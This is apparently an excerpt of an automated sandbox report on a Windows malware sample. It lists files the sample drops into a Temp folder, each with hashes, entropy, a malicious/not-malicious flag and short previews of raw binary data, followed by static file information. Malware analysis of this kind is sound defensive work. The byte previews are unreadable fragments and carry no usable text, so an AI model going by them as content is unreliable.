                                                                                              Preview:..n..l.+..i$..j.x/..{w=.dt......1b.c..U..r...v.:..8F`I..,......RB..T8&.....?..3.F.L.....~..uQ.v.....$...hsP..L...2[~b.....H..e..N.O.r.DJF.A.....,.n....8.}:...9EE....xh.V..2.s..."LJ...}%...`..g.8(_..Z...D.}B...Z.~t1........._.....J.2.p~.......mW...J.:..;.._.8...h#rS/Z=.g....at3..A.&t....W..q...%c:.9..L;...?x..s....g...&;-...q..M>.."N...|.?.?H.o..c..7......."..{...S.z...b.t.......)1..=.Z.\..s.e`.]g|..2.....U..&/.....2...G..6./.6.d...5p.......(=.7{...S...P....|..U..8N...q.z.o.M.~r7....h0...8W..B......._..1..P...oQ...L%.@..W.2;7y.....t.B9..w..#/......\.c.V#....*LE.6.=..s....~2E..."...v.x(..._...gR$H.........yv..-.x.J.r....?..4.r.7....#`.^q.$.60......U.s..:.Rv%4Y.........Bw..../k._D.AH.q../0wS].....yb..%..3.. ..4.At.lO... .._......<X.qOYo1......D.Q9..OJ.T...j..$N...._....2.a.?%"....u...7....F.y..b..e.#..RT....D....;|T...`.....p...b".$T.......)yH7L~...r..._...I.)>...P..Joc..Q.E..}L.#..d..e...|.......Xx...............xF....U"]*$%a..C....}.(...C..+...P./?..

                                                                                              C:\Users\user\AppData\Local\Temp\Society

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):103424
                                                                                              Entropy (8bit):6.720348410536754
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:4lHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQi:MHS3zcNPj0nEo3tb2K
                                                                                              MD5:BC8482E837081257787168ED9F991FF6
                                                                                              SHA1:379553FDCFE6AB6B601A2A66BCC7C177FE8F8187
                                                                                              SHA-256:855B2ADDDC345F5AD9AAAA2FB387FB3BC2FB61A427589DC1748AAC6F2ABD81A6
                                                                                              SHA-512:3659937156CF8330AC20D73F9CEDF1D3FAA0623319F981E90CE9B386DFC0412307F9EEE6DAAD5C4D892A5AF28173E4DDCB225FFB8E58C07B44947296AD2C728D
                                                                                              Malicious:false
                                                                                              Preview:...t.....N.....~Z.../......VV.....S.."....~..t.....N.....TZ.................9W.\...........1.q.V._....M.......PQ........P......P.=.........p..$.........p....8.}.....~......E.u...Y.....U...M.....|....E..C........s..h.........V....S..C......O...H...wa.$.|zE..F......P....t..J.j..U...1...m................R..a....................@......>.t.............Q.}u...C.........Q.ku...F.....................$..zE..........P..p.I.j..6.......E.........H...K..j..k...E............pq..j..S...p........j..6.C..........Q.p....w.........m.....j....b......E.....U......K..j..u..,.......<....O..q...t.Q..K...w..G.......7.R....F....t....t.....L......X...W.......S..)..S..J....~......E.u...W.....S...M.+...%....{..}..C......3........+..V....S..C..........H...wa.$..zE..F......N....t..J.j..U.../...m............R.._................@.....>.t...........Q.s...C..............E..F........N.....s....3.RP.W......V..F.........C....t....t....AK......V...t......R...v..6RP........V.

                                                                                              C:\Users\user\AppData\Local\Temp\Solaris

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):75776
                                                                                              Entropy (8bit):7.997696574637183
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:tRiKLSpuGzSIxS7PRUh+uvXm2mOLRxsXy2Rf9f8TJjbyODA+W:uKLS0GvxSdUhVvW2mOdx+F9f0ZWODAT
                                                                                              MD5:3B37E91F35A6AEEFC6B5A91D8101153A
                                                                                              SHA1:B841BD260AF6BD4D2BAEBB00413CBBB6178EB1CD
                                                                                              SHA-256:7087BD749974238776890AA74DA73189A92D40CB1A2F9D84CDF6301AA4395F75
                                                                                              SHA-512:4761957076C4FBBADB183BEE69645F65CDDFDA8DCD29B8EF24CCBCEC8B2BBA09E58FB36E7F0056A75F640ED3C9463172F03B2315A492504755D48C5CB39A66C1
                                                                                              Malicious:true
                                                                                              Preview:}Z.*..-..IR(.h.._e.a.iZ.j.....WV.......F..Y.+.*V.N.....+}4:o...1....%.x.......>..P.zE.....j'..'#Z..1...i..M*.........#7.z...=._..j.....{..(......Y..pm6..9..+.X.Q....#.;...#........i...#i............v.4.1...E..}....e.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...F.O.'.F...h..............K..7....K..7...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.!..,P..Myn.2..t.W.....*...n..IB.K......K..7...m.....I.....5...x..2).U.j....2>..#.~.\.HE......i_.H...U>D.s.,t..?.....=.a....:'...&F,]._..dWx-.d...[f..&g..!....B ....e..6..r8}*7..2s.7~s...>~.YH.m....x)e9.L..D'q...`.I.X.@9..n..C..52nB..wt..^*@.Z....'.8..Q.r9...M.+7.....{uY..Pf........3..XI-Xop..,t..=.EW..D.o1S..T*......3....n.e.Q

                                                                                              C:\Users\user\AppData\Local\Temp\Specialist

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):63488
                                                                                              Entropy (8bit):7.997285735950619
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NxOKftW/Z+yOHSqq1SS+aa8KRrHf2ypbVBe:zLlyZcHaa8KRLhre
                                                                                              MD5:8270F3C744085A7C901BF7E295B3F338
                                                                                              SHA1:30C4BA9E939716E202C67BB10D90199FD18478C1
                                                                                              SHA-256:26886D88750967DE149EB94EB46AD7328E4DC107F4693CB4D335E6EDC4906A82
                                                                                              SHA-512:3FCF42B51B7D19E1629CB94225B8B186302ACED4D8286BD5ED298A67FFF1692874CABB776F94EF9049D58411A93D0B8B8766B3841B0094737530427808FC0B16
                                                                                              Malicious:true
                                                                                              Preview:...QQ.my6...jNy..K.3.....S|..kf.........A.....UZ@K.......;Q.$.JShn.pB.;W.x.bU..l#.c[./....S./S...Z...|C....u:..4\....9....H.W..{/V...5..6.b..b.~.obE...w:Q..K.*...L+.9.......E.U.5..qz....pGL......U.g.._....X.|...?{>^..O.y...B~"."9.5."{X_OR.+./.u..i.."........P`./.Q.....G<....3.U..d.N......Z{.M............=...@E.f*Vr...P ..P.^.9H.1.qB!W743?.0....j....hym%4p.!Pv.....UN*,b....Lqi#.:AZ...d.J....a_...M..2....a.t..&9p,q.b..(..:...U.J...7OY.$a..^......r..j.......[5....}.._.G6C^...v@,...C)..i..q....<.....B.^@.. ....a.0?..}...4.3...U...1}dSA..[..?W..~h.o..)Q.?..xZUfP".NSh>8.1*t~e..X..1..S+$.4.$.(Wp....57.d..t...{<.TD.[......7_|3..&...NGOV...Q..i...g.\$.^.JO....i...I.....b6Z.+H.ROLP...(..b.w...n..]u.v0..3....@O.5.(.$..|vm.F.*kta.../xY..-.O.6...:3v0....x<...m_..?7uhkH.:n..L.I.1..@......c#/v...Kv.....R...IW.Ay~.;.T..n`...y...y5.=..!V.c....J].}.Hz.6$..-p/.....B\B....Z.Y;...8.+..d.`D.P.iJ..%.]`v%..iD.$...[".P.....^..^.......Gh....'F,.

                                                                                              C:\Users\user\AppData\Local\Temp\Specialties

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):49715
                                                                                              Entropy (8bit):7.996419498927052
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:9PslbzQHaOTlQq0KAcs0CtSEfvrp6Opa3H1ToU16y7fwyveGXM:VubzQlTOJl5tfvgOAGU1t7ffXM
                                                                                              MD5:F883FDA054EC2C66C3B46BEA6F087420
                                                                                              SHA1:B202D846CA77FFAEF48F8195D8B133DA66CDF00D
                                                                                              SHA-256:591D783B7DE462751300D2834C5DC02E9191FA48C947A857E185EB2BC8436AE8
                                                                                              SHA-512:5EC41E0BE4FA15B3E1C136EE13C9671BAEAC7B6D9F8B85B77C9EC194661D720F375F4A1A3718425282D53D1B7E4112154ED37094465D0240569E2D5DD5CA05C0
                                                                                              Malicious:true
                                                                                              Preview:R.9z.y..u.(...S.....f.8..x.GG@D.[Q...u...?.W.S.e\.;.....t....t?.....A...*.C..... ...!.L..g...`.0..k..C+._......>...Im.#.....-.G1...t'....[>.T:..:......Q/.I.......pb3N....N....:.Zs_..l#\.-.I.!H..biX..H.8....=...f<1..X.>...Z/.;....../.3p>[....ji.IA..H......Y...|)D.w]...(.e%..^.y.O...{.a...I..P[Ue.9,..p..(c.H#.7...v.\.....B..%gN.\.......D.9..^A...q....2-.$....$....MH.... o;h..l..._.H...I%..^..&....?a7.y...$vp.*..&.XM..b.......tx.X.p=....jE._@..U.x..<D+$..*.y..-Uq.B..73z._.(..$....".....M<..^m..{s.....(....HM..<......7...|.4.+.6.g<-Bx<|.Y...@.......T......uohh:>#BfN...#....b..s.........a.>\lejX,....D[M....[3.........o..f..yY.*...j.NO..X....(..............{..x}E^.:.Z....b......o....B......{.6....l.l"....n}.}.....R..N,-...&Pk[.8........m.....N........(.kJ:....VMU....r.r.}..K.L"s.4....i..;`..w........)l.......a..yD.1.S.7...k.... .4.M.BN....c@..<.F,Gb.9.1.>.0.....LT..s..|..#.=.0."......B]*<[*..gs=@X..ivX..c..Z.a.+..r6...Y..... U.-.%V./V.....Xr..4..

                                                                                              C:\Users\user\AppData\Local\Temp\Spelling

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):74752
                                                                                              Entropy (8bit):7.997530948349727
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:RG2olUqJG+pRgsnJQ5gx/fIOqzZA98Y6x741/KJJC8Y5UN:EJlHTRgSJr/tqdS474pKJA8YKN
                                                                                              MD5:C50D303E3A009095EA7AA55C330A83C8
                                                                                              SHA1:8FCF589692920B8EE7197F15BE274FABD01B4E4C
                                                                                              SHA-256:33DB9130E999A343CB5E95742C0A01EEF2BC1416A7F1BD8BF2DBA528EA6372C9
                                                                                              SHA-512:8725D66C2C4BA23BD894D60EA7E90F9875D65DEF0BEFEC5E13835471294664EDFAC8D3BDC7979902299CF618D218EECF89CC85664CCEEADBF46B99F6EC2BDAD3
                                                                                              Malicious:true
                                                                                              Preview:.=/....3.|........+.r...e...L.4.....H.L...5..D.E.5=%.a...M...k.. ..\O.T..".v...aj.8....S3...........M\..pJ....~yl.O...}r.=.0....i.B.b.FA..b....kC*.uy.....!?..\.w.C....P......U..c......D..C....C._..-p..Pf.+......n.7.":Y\.^........F..#l.%!Dem...'L$c.Y.NOnU`......4G.._U3S4..sLm"?...@..I<.=8.x..2}..\C.....}/......e`D8?W~...t.....W1......M.zr....h_.-...{..h\.................t.x........9...Xuv.6.gjk$y@~D..x]...m.G.:{l..A..f{y....o....Hp?i*-...+.+.....E<7....dN.....pv.J..Nr.z...YAU.3......M.{.r1V.}di..B...........tJU._......O`.k.....~.b.l."7.~N....Oew..y..[<.+$J.....{.)..b..5...B.1......M..e.f4.w.Z.K..."*....A5g.....7.#Z..,....)&.p.*....R.g.....#5.Xa+.!.r..H|....c...Y..lz.M.7.f....xZB..i.|}o.\.?.H....IRt.* ..E .s.d'|....S.>..p....y...#...s&..0...h..8Q..{.2..`....."..P.h....&7).}.KR........W..:..O..\.....;Zt...j..).......wN..&gG...b..+Hr..y..k.'8....'.v./.q*..#...}.0....1wz...K{#Jk...>..."ZB@....'@w.o..e..o>......bE]%.!?...........3$`....J.v...2.OK.

                                                                                              C:\Users\user\AppData\Local\Temp\Started

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):67584
                                                                                              Entropy (8bit):7.997117637203714
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:+09pRn+FIcaHsx6I3CbzlB6VW1AZG/0QXbDAKKI:+092iVHsEIy64WZonbDQI
                                                                                              MD5:662EB5D37E0BF1C37B053F2D6FEDE6A8
                                                                                              SHA1:D153CDC036BA55B1E17EF32DE253B10D4B556D82
                                                                                              SHA-256:4C8CC6AAD4EB27CD597D8B594F6D8D174A22C56A476CB0CB8F97A0FD631F97F7
                                                                                              SHA-512:EBC20098BFBCC876AD5E93F6D5FB784379D2571476C5E57CA8FF1AC374CE4E31B5708C814CDF07C6D1B411B2B38AB2653745D3F6967229881ED443B315FB2A2A
                                                                                              Malicious:true
                                                                                              Preview:.l*6.'z8.d.(9..;.;...b`.rl..p....Y.....J.Kb..e..k.R...t.8. .{..A...|..)...I......;..S......].y.I.4....;.rw..MgjxXH.C..;..'......i..t.9.n+......?.2..k..u...._.i,..Rs....1...VT.wU..P.....T{.+.J..=..g.4...0.Hh..".9M7......:.<......T.=~CI.....w....%......u....S...4...]L..~...\....\..M...WQl.....d.....W1E.^r..-^.......K. ..R.y..B..G...E.m&azb.....iZ........h....AR.....%[.7....g.:...l.)..=....AE._..6|[....."..t....$...f..Z....`Q...ovb.%.T...1{...D9I.kH....4..5.$.".>!...Y%..3z.jF.f.1..{8.z......hl....A..~....|../-...tor....]@.AH*..@.\....?.p..3...H.9.....+.L.(.2...U.z.Q.2.O@...=f.R...H.6.Z.@?.Q.l.Nt..........5....R.{.i.^4.Z..;ch4....khE......g.@.t..E=..4.'....n.e#.*.e.r.....+.n.M...$.k.;..4@.....S\.i:..C.I3?.?..r.c..Z?......[t.V//.$....fT.(..;"e....<.R+.m/.j"X...M.`kv|Wux.E.i.<@..^l..=.3X......R....F.......o..A.."..[^4^r-.a.].?...`.j.L...&Y.I.7..qS(..Us...p..y:..3.m..W_.H.L.....%....C..c....Mli....H.W..;6...vS^{....(p:.....C.n..B....G.,.w.g.K..9.<..\j..

                                                                                              C:\Users\user\AppData\Local\Temp\Syracuse

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):104448
                                                                                              Entropy (8bit):6.281275211983412
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:6de6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBN/:6d314V14ZgP0JaAOz04pF
                                                                                              MD5:7783FE6744EBFB52F58A026474DE5AA5
                                                                                              SHA1:ABD31C20C25610A87FAECCD629D08855E27F129F
                                                                                              SHA-256:C7FDB060C5F612A8EE6BA330D9D79BD1D48BB5527F1BDD3C8D27D9E110F929B9
                                                                                              SHA-512:763ED920D34AEBC643FC859D2BBD9539437FBE7787D8F1F4C321DC849019B119418EE096DC9E3EB5AE122C4D24CBD434C02450D26A349D2C35B82CC14A24850A
                                                                                              Malicious:false
                                                                                              Preview:...._^[].(.U...x.E.SVWP.E.P.u..Mq...........M.3.@)M......9........................E.......y...x..E.'....U.U..x..M..x..E.E..u.E.}..E.j..E.Y.......E.......t..E..M..T)M...............u......H4.M....u..E........@..E..}..E..5H.I.Pj.h2...Q..j.j..G..E.h....P.G4..f.......G...........2._^[....U..E....u.j.X..u....SVW...P.x:...u.3.SQ.u.SSSSPSh(.L.SV.E'.............u....Y.....M.Q.M.QP..o....t_.M..@)M........;.uL.U..T)M.............u6.M..5H.I.S.9.T)M........Phi...W.A4..h....She...W.....W..<.I.2._^[]...U..QQ.E.P.E.P.u.._o....u.3....M..T)M..u..u.....u....0..H.I.....U..V.u..>.t..~..u.h..I.j..6..@.I..F.^]...U...8.E.P.E.P.u...n....tz.M..T)M............<.wAtQ<.vM<.t2<.uU.E..E.0...Pj..u..E......q.....I...t1.M..E...#.I...<.t.v.<.v.<.v.<.w......I..E.......2.....U..QQ.E.P.E.P.u..]n....u.....&.M..T)M.............u.....................U........E.SVWP.E.P.u...n...].3..........M..T)M..........M.........1.u......x........................+.tw...t......C...WWh....V..H.I....w...WWh....V..H.I......

                                                                                              C:\Users\user\AppData\Local\Temp\Tft

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):70656
                                                                                              Entropy (8bit):7.997548540982771
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:rqtbA/dSLb3376ysrqYVA+AEsVNUz+sFHPviWcbZKWEnpX:rqtbQM/33+ysjjiy+Cc1K9npX
                                                                                              MD5:2D0F361D7B97C89A88521FDEBFBA779A
                                                                                              SHA1:1DC0B184964CEFE04C9B6BF9733398067905F925
                                                                                              SHA-256:5AD087E5E6AB39496651BBCC805817B7CA9837B32F2DCF52A014EF49B1B2DFD8
                                                                                              SHA-512:29AFFD751428D93AFF25F73638CA756AC3E8D3949F0E69352A67E6461F1C079FE0525E4D1B1B298DF0688E6C8A5D222214E4CE30250003FAF6DAAD7FE279C8FE
                                                                                              Malicious:true
                                                                                              Preview:..qN.x<..5Nck...Us...8...r.ka..p.~T...$...P.8....,.Kd.R..B.....I.f..S..Q......r.ZK.].."w..D...oD.. D}..P.o...*.SD..3*..}.G.Y_.*...j_f.wc.6.H.c,....z.3&.t...oY..LF....(.....L..w.<qj.gk..!.....J...%..#..79..4..d.Kx`T...]...Q..q...v'..^...z%....W.'..k^.*.fsc.AX....(...r...9.....&.Q..wh/...#A....P.[.Za.#..j).9...c...W.).W}.1a"[;......S(.....[A-...v.v.0..`}.nJCEe...Az..H..=%...[....$......1.l.......3.q!......XW0.**a.......p.......#.b.6..f..#:..1..#.O..g.Z3e...../.].&..(..E.4.A..IH.+.....3.8i...4Kbs....vb.Zt.".e~...|...l.e....Kz.j%.P=m.#DK.=.T...g...].........0y&Sf..DL..r......J...0YY".X....3.;..O.?..6^1.M(.D.ZQ.-.....9@.....1#...b..'..QI.f..$..........U....N.'...1.........3....ld..'..Y.Y..7Z+|.......G:y3...%6X.N...</cs.I._[Q.!.q..(4..k..k.....W.`>..O3+ks......(..........V.|\.8....B%...a.w.h.** ...wq....,..4.H...8.y{./E..^R..PAS....".:;......{.G....y.X.K#sL,.o.......M./-:ei.[....a.X_V.s.d...;.......I. z.Ab...\]'.@...;.7.W;...&.).....U<`...

                                                                                              C:\Users\user\AppData\Local\Temp\Tonight

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):70656
                                                                                              Entropy (8bit):6.5303758356556845
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:P1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzY:PZg5PXPeiR6MKkjGWoUlJUU
                                                                                              MD5:649755AC231CA4ACA6EBF0EB1DC6704D
                                                                                              SHA1:8ABDFAF8AD207CE5927E120C703B64366FACB073
                                                                                              SHA-256:B86D8F9374D7DB5B6E03C699DC7602691EE7F89A94F8207EC4F2E3DE21C5DD48
                                                                                              SHA-512:14FD8E7C55E4A1F9360B7E5B5EA1A359CBB2331C8FCD43F75A3BA10AFE6E29B37B947ADD7E971ECBE168C7EA5DE7C076E171CF6B63984D27652C2DC001F994A5
                                                                                              Malicious:false
                                                                                              Preview:ComplyFailuresGuardsDomInvolvementRadarScreensKidney..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\Turned

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.99721220612682
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:B+xF/x/a55jhuEkiiMFEZ+ZySaZRAOZhiS4ZUQ43n1CiZjpISCuqYAo2p5h7O+rq:UxcsprMlZy5juSOUQ43giZvcr1h2
                                                                                              MD5:776749EED30AACF122F461EB5AE9204F
                                                                                              SHA1:DB8D8888B261F52438EBB0C1581C58F999D3F409
                                                                                              SHA-256:EB04AEB14F3A4A9DE2CE66560615DF41304FF8A053C74CA0E538C47496F38D3D
                                                                                              SHA-512:561C2E13A4F3F2545F708850914333CE2FFD8C3A9C5973EE213AFD92FE1C1A5FFC13A9A1FE8659B3BB775F387BA8729DB8F16703C810192C1C95974B5F52340D
                                                                                              Malicious:true
                                                                                              Preview:....p..<.S...u.>...C{..{.`j.v\0[E..\(..}..`C._N.zq&..S..|*$7._...`...7........S.2...G.Q....W.......O....7@.Nv.......r.D.....B..J..[M...z.h%H5phV.r.`.J........z..$v`..<.X.?L.".gg...P.Q.'/4W[...f..\....0..~...ci..c...q2.....n|.....]...T..V..\...Q....../c:}|[..v...G..i...X..T.O ].....U.._.>h..AB:.1.z....SY.[.d...)k.M..e....0.7.{X.$J..+....2.....9.%.A(|@Oq..3i..U...!.N......l.....X.o...._...K3.............u...'=.+f.. =(...t.S......H..irE.i.1t..F.D......:D......$^../^*...t.......{.x.~.).....Y=..I_D...Y..(.......}j\.:j...#}.n..>.?....1...e..z.`=....W..t...^..p...Hd......p..].M.Gv....|E.....rY..g.....p...&.%...f.D..NC./..l..6......}..OH...L6.*I.|.<.k..%.aH;.y.......&...r-...-.Q../.\..`.&{c...._d..|c..[.Vyx..m.~.$Y|oY....X.._+......y......`....}......dg./..._../%.+......Mr....E|8.a.... .l...3...s.{9.,y.L..V.&.N.j.*|M4.i..;+.I....R.v.'.C.3..J...qc=0.....h-..A..pt]K...SD.uU....]c.Wb...8.|....{.e0w-..@wU...E..<wY.N..s.....c.........)|)......F.?

                                                                                              C:\Users\user\AppData\Local\Temp\Usc

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):92160
                                                                                              Entropy (8bit):7.997925997775209
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:amp0TOPUD2I761v/D74u1sAvbrUfkVlR+ww46yPPHBxefA/OMp2tr54g1iOd9T1T:JfP1z4uOAvfUfkfRBw4b3H7eoNRQ/T1/
                                                                                              MD5:F3AE69B02EE850DA91795384A7BFCF49
                                                                                              SHA1:C6FD817AC31F8C31C38164DCE6ED985B0F1CA454
                                                                                              SHA-256:7862D5611B20DB9BD5A5DE4475DB98E4FF85745E11CE55BC8918F8897317D1AE
                                                                                              SHA-512:BDCDE65EAA7DC31E860AB72F53AD1CA6A48ECCD1F5E463A5EC270B251E377E034CB1A2F6781BD6EAB291A371C859197FB30D5693939DF307DD34457F6847E3E0
                                                                                              Malicious:true
                                                                                              Preview:-{..R!.VD[.`J....T{.......*..k..\J.....M.........d..=..r..d...M.......(LJ9V..b.c.+..2_.u..\.........!S...].....k..}i@~..pS..">.&...H..m5Y.......(....vKa......?~.S\.......>....Ex>..D......f../*......Z.$0.UZ<;.p....e.{9..}...U$~....0_O)..#.'.X8"...]q.`z...^..(#......ED.J.Y.k.A'k.t..b..#....zS2.Z.l...p%Es.B<.d..9...'.E.).~%J"%q.$...>=...p....L[:i.2.^*>.{..._.|.zY..B..C..".......'-[F.3r..X.... LR.2.;k....b.J..`0f..rN$...^....V...*G...\...&z.e..a....672...&...".f(...K.;(......F$Pc...w.....8...z......{...#..5kK.....N....&....`.F>....3.........O.'.Z.........M..Ng=r....l...}...[.-=..."...5b.......v._....5.."K<k..x.(..8......+...3'.a....j.s.[..4....E.A..,.....>..k..M.]......e.a...m...T..H.4..I^#[q}.[%..%.q...Z..,I..Qr.".&..LH9....A(.....qY.z.y...............+u..Wv1..:*.....]..Y.?.<.D..$.......q4.S7..`....../@P..R......)...WZ....x..i1+..p..7\.....W.5..I....'.8..J.(vA.2.3../MQ..7o4ye.....J'B.{.#|F....U....q..#OD.F.:....`%G-......U...;.EH..

                                                                                              C:\Users\user\AppData\Local\Temp\Viruses

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):89088
                                                                                              Entropy (8bit):7.998229825733063
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:1rQ5wNTOY5aBR/zrwbr//qTX8BFQXYwWJhr+ynJpJEqfub8/pRi3YBERRFO:1rRN/AzILBKXxwr+yJEqfSwi3YB+RFO
                                                                                              MD5:30770A0333EBFBC789BAE3EA0953D0FF
                                                                                              SHA1:540418B2911B911D8F79FE32C85B755D77D446D7
                                                                                              SHA-256:F8D9985873C401AAF10909F66F4EF621D6EA0C39E6EB2E530B4CE16723E33515
                                                                                              SHA-512:7D4B53D5A40F135F8517952667AB854DC4E0D3C67C0ED625DB541210107D1AE03E45A814F0683C93D1396D8B7E8873C4A38301A7E6BBBA14E24D17DA9D4E549F
                                                                                              Malicious:true
                                                                                              Preview:..U$.B`.........F...0&Y|_.L..3F-O..G.T.<d.K..&.C.Z.N...+.|.:.......#..c~....\.......2...I.].f'*......F.-..p..(...qu...t.-....Y..w0`.0....)...4..w.,_.....gud6.3....T.:.Bm.*...MHSp....A....g..$fh}.Qh~..Gh...........}.....\.....*.jg.l......m.")q............6.:....=k(....>..9%.b.@w5.. ...-n...r....O.....f.`0f.\.....<.&v.x6z-....M.%.n.....Y...L.p~g.oO.@..C.....u......TD.4.K.3lM.E..%.\...P..4B.g,..x.f...r.....p..ZN....sx.oE.....S8...6zl..&.+.E..g...q.:b\Y.b..<..:\....^f,... ..n.N+.:WE..k^......Q..F.h..._..(;jr.].2..v.h...&+.J......!..A..<....).$$..... ...R.$..jvW..lL..aI.3.I,zj.a ..2....%..4`l...q7W..85:...Y.[....N. .2&..z.8.s...#..3&...._aj!3q.8. n.|....I.)..=.....D._.-9.j...`|..{....Wm.1>hS.m89..6.LscQF....F...Q....O.CsQH5P.|gP..@vv...o.."HH."x=....'.........T....H..h..2.."..7....H.C{...I.jT...o.O.....d....H_m*.i^.(B..I.8W mn.......h......~.FU[sH(w...7.t....kN.}.K.?q..ED...ao*.....=]%...&.=..6..2os....9..............I.z..~.F...|41xI....^21oa..l.Q`

                                                                                              C:\Users\user\AppData\Local\Temp\Wallpapers

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):94208
                                                                                              Entropy (8bit):7.997991894566745
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:o8PS8wKEb21O0ufjroLxT5KRmmxhyy1BhhFogEGpIuCox/haDoT4N:o8Pa2inITKRmmxH15Cw/haDou
                                                                                              MD5:D528156A028A88F30E8423EC166C5E1F
                                                                                              SHA1:46E05DE2D13B7305250724FC37A62130188DF41D
                                                                                              SHA-256:EB2AC641C1FA9FE908F110292A1593D7926AD8E97662F7CD0D09EA19D05516F1
                                                                                              SHA-512:84FD60C7B6BFABC979C18F3D4E67DEB0237C947FA032C662539946ABB334F790F1B7FD0EEC6A1F136AA69532BB8FF6B12A7FCDF0B1AF0A9F410326818D2DEA20
                                                                                              Malicious:true
                                                                                              Preview:.........v.........6....T......rd...F.".V.<.<.H.Rq.Pz......./..!.!]...=....#..]...o.v...k...;:...O.B.h...Q.yM..,.]..l_........._B.4..|...E..t..C....O..'3.%..._.?.q!....-p.@.D.E.O.wV.5.$...rX4L7.x....^o.A...T....`.).I.[b..,...+...\..IbK..y.....t1*...... 1.*...V\..5l.W-.5.....M.........Ysa.j|L2...Z..2.1<j.`.y.....Y.....,. Q.....A?.2.'%.a.-......-.X...~Cs.r.|.OH...Pn...F[..^.\2.[.!..9....^.......fI.<.&.$\....".h.q^m..r....F6.vQ0..Oo.t.cn...j+.SP.%....k~U-...R...,v{....w.&8^KV...!...7.yu..>.t..![......M.....1.qZ..~.qd......ZG.._.X...4D....a...fF..F.....}.E.J...n....D.#Q..<k...;.."...Q.......j...?![....l.b.$S.........j.!..Q.j.#{............@...S..bgw.J........h.s......dK.f.8...g.{...X?.a.J.....T<?..@ yd./.5./.*X....{..?.9D.#'.$..........A..w......Y.|AB...,jn.6Z..n....yQd.w..{...u.&....y...~...~...5..u^Y.P.g>v..C.V.....Z.|w8.9....R5.......=..9.#...$T.".g.#....Gb...0.......#a)h.7.r.N".p.]...) .g........&...n0.]l.6#F6.......0F.5.y3~...\..........$.0w

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.995927308335554
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:OR8Ti8rf8h.exe
                                                                                              File size:3'391'331 bytes
                                                                                              MD5:6681713c421e1b4951d5a08c39f43e97
                                                                                              SHA1:23c09997b6cac46683950dbbefa18d65b3250d12
                                                                                              SHA256:af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f
